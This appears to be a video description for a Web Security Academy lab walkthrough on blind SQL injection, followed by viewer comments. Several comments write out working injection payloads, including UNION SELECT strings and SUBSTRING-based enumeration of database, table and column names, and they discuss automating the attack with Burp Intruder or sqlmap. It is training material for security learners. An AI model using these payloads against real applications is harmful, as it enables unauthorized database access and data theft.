This video shows the lab solution of "Blind SQL injection with conditional responses" from Web Security Academy (Portswigger) Link to the lab: portswigger.ne...
Hi Michael. Great walkthrough of the solution. I wanted to point out that you can actually execute the last series of faster using a cluster bomb attack type in Burp Intruder. This allows you to add payload positions for both the substring position and the character evaluation. Then you just select number list and brute force (or simple list) for the payloads and use the grep match to locate the correct values.
Hi Michael, Thanks for the video. Is it better to pay for the Burp Pro License instead of using the community edition for the web security academy course?
Extremely helpful thank you. I don't know what it is but their solutions sections just confuse me a bit more than I already am lol I'm a little confused though, so wonder if you can answer this? Do I need to URL encode all my commands when using through burp itself in repeater lets say? I find somethings will work fine without encoding and some commands won't work at all until they're encoded. So feel like I'm spending double the time on most things working out if encoding is needed or not. An example would be: ' UNION SELECT NULL-- No encoding needed '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables-- Can't get it to work without "URL Encode as you Type" enabled. Thanks for any advice given.
Cool video Check out this video tutorial link below ru-vid.com/video/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE-bG9aKLJySDg.html The software does all the work. We in the 21st century. Work smart not hard 😎🤘
because the original unmodified query would return only one row, so then the modified query needed to be limited to 1 row too, else multiple rows in the result might confuse the program logic which was expecting only one row result.
In this case this info was given in the question. But if you had to find them out you would have to: 1) Find out the database name. You can do it with payloads similar to: ' AND (SELECT SUBSTRING(database(), 1, 1)) = 'a ' AND (SELECT SUBSTRING(database(), 1, 1)) = 'b [...] 2) FInd out the table names: ' AND (SELECT SUBSTRING(table_name, 1, 1) FROM information_schema.tables WHERE table_schema='') = 'a ' AND (SELECT SUBSTRING(table_name, 1, 1) FROM information_schema.tables WHERE table_schema='') = 'b [...] 3) Find out the column names: ' AND (SELECT SUBSTRING(column_name, 1, 1) FROM information_schema.columns WHERE table_name='') = 'a ' AND (SELECT SUBSTRING(column_name, 1, 1) FROM information_schema.columns WHERE table_name='') = 'b [...] Of course, the syntax varies on the DBMS being used. Alternatively you can use sqlmap or Burp to automate this attack.
@@AUBCodeII Hi, thanks for giving useful insight on this, however when i try to do this using this tutorial i did get the db name as 'postgres' , but could not get the table and column names. Is there anything missing on the syntax
@@steneer6789 Hey. These payloads were designed for MySQL. PostgreSQL requires a slightly different syntax. I tried to include a link to a cheat sheet from PentestMonkey, but RU-vid keeps blocking my comments
@@AUBCodeII Oh ok will check on that, because what i read from the cheatsheet provided by the lab it seems mysql, mirosoft or postgres using the same syntax on this